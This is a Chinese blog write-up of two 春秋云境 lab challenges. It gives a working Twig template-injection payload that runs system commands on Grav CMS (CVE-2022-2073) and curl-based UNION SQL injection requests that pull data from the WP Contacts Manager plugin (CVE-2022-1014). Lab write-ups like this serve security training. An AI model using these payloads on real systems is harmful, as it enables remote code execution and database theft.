【春秋云境】CVE-2022-2073靶场WP和CVE-2022-1014靶场WP

最新推荐文章于 2024-08-03 10:15:01 发布
最新推荐文章于 2024-08-03 10:15:01 发布
阅读量1.6k 收藏
点赞数 2
分类专栏: 春秋云镜 文章标签: 网络安全 web安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46029520/article/details/128231197
版权

【春秋云境】CVE-2022-2073靶场WP

网站地址:https://yunjing.ichunqiu.com/

渗透测试

1.已知提示
  • Grav CMS 可以通过 Twig 来进行页面的渲染,使用了不安全的配置可以达到远程代码执行的效果,影响最新版 v1.7.34 以下的版本
2.开启靶场

请添加图片描述

3.创建用户

  • 在打开的靶场页面注册一个账户,填写完信息之后点击Create User即可

    请添加图片描述

4.执行代码

  • 点击Pages–>Home,输入代码,点击Save

    {{['cat\x20/flag']|filter('system')}}

    请添加图片描述
    请添加图片描述

5.获得flag
  • 访问首页获得flag
    请添加图片描述

【春秋云境】CVE-2022-1014靶场WP

网站地址:https://yunjing.ichunqiu.com/

渗透测试

1.已知提示
  • wordpress插件 WP Contacts Manager <= 2.2.4 对用户输入的转义不够充分,导致了SQL注入。
2.开启靶场

请添加图片描述

3.漏洞存在位置
  • 漏洞路径/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact
    请添加图片描述
4.sql注入

  • 查看数据库版本

    curl 'http://eci-2ze173nkohbajx7g2j3c.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \
	--data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT version()),3,4,5,6,7,8,9,0,1,2; -- "}'

    数据库版本为10.5.15-MariaDB-0+deb11u1
    请添加图片描述

  • 爆库

    curl 'http://eci-2ze173nkohbajx7g2j3c.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \
	--data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT database()),3,4,5,6,7,8,9,0,1,2; -- "}'

    数据库名ctf
    请添加图片描述

  • 爆表

    http://eci-2ze173nkohbajx7g2j3c.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact

    发现一个名为flag的表

    请添加图片描述

  • 爆字段

    curl 'http://eci-2ze173nkohbajx7g2j3c.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \
        --data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT group_concat(column_name) from information_schema.columns where table_name=0x666c6167),3,4,5,6,7,8,9,0,1,2; -- "}'

    发现字段名为flag

    请添加图片描述

  • 爆数据

    curl 'http://eci-2ze173nkohbajx7g2j3c.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \
        --data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT group_concat(flag) from flag),3,4,5,6,7,8,9,0,1,2; -- "}'

    获得flag
    请添加图片描述

果粒程1122
关注
专栏目录
WP2022 春秋杯 Write Up
woodwhale的博客
12-27 1247
2022春秋杯部分题目的个人wp
CVE-2022-21661
热门推荐
Battery的博客
11-23 11万+
2022年1月6日,wordpress发布了5.8.3版本,修复了一处核心代码WP_Query的sql注入漏洞。WP_Query是wordpress定义的一个类,允许开发者编写自定义查询和使用不同的参数展示文章,并可以直接查询wordpress数据库,在核心框架和插件以及主题中广泛使用。源码位置:www.tar。
CVE-2022-2073春秋云境.com
qq_42036164的博客
01-25 323
CVE-2022-2073春秋云境.com
vulhub靶场之WordPress
最新发布
ineedmoreMuQ的博客
08-03 855
靶场地址,自行去gethub找安装靶场,使用vm虚拟机或云服务器 需安装docker和docker-compose执行命令开启dockerdocker ps -a查看运行端口访问进行wordpress设置。
[春秋云镜]CVE-2022-2073
niubi707的博客
12-03 5433
春秋云镜CVE-2022-2073Grav CMS 可以通过 Twig 来进行页面的渲染,使用了不安全的配置可以达到远程代码执行的效果,影响最新版 v1.7.34 以下的版本
春秋云镜 CVE-2022-1014
qq_22002773的博客
07-24 530
春秋云镜 CVE-2022-1014
春秋云境CVE-2022-22733靶场WP
果粒程
12-07 1684
春秋云境CVE-2022-22733靶场WP
春秋CVE-2022-21661
09-04
- *1* *3* [【春秋云境CVE-2022-2073靶场WPCVE-2022-1014靶场WP](https://blog.csdn.net/weixin_46029520/article/details/128231197)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra...
i春秋CVE-2022-32991
08-12
- *1* *2* *3* [【春秋云境CVE-2022-32991靶场wp](https://blog.csdn.net/MONSTERinCAT/article/details/127261129)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip...
CVE-2022-22909
07-29
- *1* *2* [【春秋云境CVE-2022-22963靶场WPCVE-2022-22909靶场WP](https://blog.csdn.net/weixin_46029520/article/details/128208529)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630",...
墨者靶场 初级:WordPress 远程命令执行漏洞(CVE-2018-15877)复现
qq_43233085的博客
01-21 1455
墨者靶场 初级:WordPress 远程命令执行漏洞(CVE-2018-15877)复现题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 fck编辑器利用。 实训目标 1、学会利用搜索引擎寻找通用程序组件的漏洞利用方式。 2、了解一句话木马的使用。 3、了解burp的基本使用。 4、学会利用iis解析漏洞。 解题方向 根据题目提示,进行网站测试。 解题步骤 启动靶机,访问链接。 使用御剑扫...
春秋云镜 CVE-2022-2073
qq_22002773的博客
07-21 336
春秋云镜 CVE-2022-2073
靶场wp
东方
09-24 1020
1 代码审计: http://xuptnetsec.site:8089/first/index.php?tdsourcetag=s_pcqq_aiomsg 代码审计题: <?php /** * from Guardian oath * **/ show_source(__FILE__); include "flag.php"; $data=array(); $pas...
WP-春秋云境-Tsclient专业徽章通关指南-flag01
qq_45234543的博客
01-04 849
Wp-春秋云镜Tsclient专业徽章Flag01
春秋云境CVE-2022-28512靶场WP
果粒程
11-26 1263
春秋云境CVE-2022-28512靶场WP
春秋云境CVE-2022-25488靶场WPCVE-2022-25401靶场WP
果粒程
11-30 1298
春秋云境CVE-2022-25488靶场WPCVE-2022-25401靶场WP
WP-春秋云镜-Unauthorized靶场完全通关指南
qq_45234543的博客
11-23 1456
Unauthorized靶场完全通关指南,手把手教学拿到3个flag
春秋云境Initial WP
m0_62466350的博客
12-05 1133
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。1.菜刀在php7的环境下不能用,这个可是踩了大坑了。菜刀连接PHP WebShell返回200错误 - 知乎 (zhihu.com)[外链图片转存中…(img-SvBaevSt-1701756474326)]1.菜刀在php7的环境下不能用,这个可是踩了大坑了。菜刀连接PHP WebShell返回200错误 - 知乎 (zhihu.com)
春秋云境CVE-2022-32991靶场wp
MONSTERinCAT的博客
10-11 1万+
10月10日10时24分,基于多年来在网络靶场领域的深厚技术及场景积累,永信至诚i春秋正式发布春秋云境.com社区,以春秋云底层能力为基础,以平行仿真技术为支撑,以高仿真内容场景为核心,打造网络安全实战“元宇宙”,通过更加多元、开放、创新的线上技术交流空间,为更广泛的用户群体提供更轻量的靶场体验,助力攻防两端的实战技能提升。春秋云境.com。
云服务器搭建ctfd动态靶场
03-13
我可以回答这个问题。云服务器可以使用云服务商提供的虚拟机实例来搭建ctfd动态靶场。具体的步骤可以参考ctfd官方文档或者相关的教程。需要注意的是,搭建过程中需要注意安全性和稳定性,以确保靶场的正常运行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

果粒程1122

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值